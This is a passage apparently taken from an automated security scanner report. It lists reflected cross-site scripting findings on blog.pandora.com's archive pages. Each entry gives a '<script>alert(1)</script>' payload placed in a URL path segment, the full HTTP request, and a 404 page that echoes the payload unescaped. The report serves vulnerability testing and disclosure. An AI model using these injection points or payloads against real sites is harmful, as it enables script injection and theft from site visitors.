<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)</script>6fe976a7326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)</script>d255db79943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)</script>be446c1f728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)</script>f1ed4fecb73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)</script>9908a654cd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)</script>58d715564b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)</script>a0d7ecee19d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)</script>23fb059918f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)</script>4ab9dcf9e4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)</script>0065a69c7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)</script>d935da65367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)</script>04772bbc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)</script>cbd4cc45e8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)</script>3e9b7737a01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)</script>2e63fd05877 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)</script>8d5991e8eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)</script>2c5162fd032 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)</script>d78d8cd256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)</script>15a4ca42e12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)</script>eae0ddbe282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
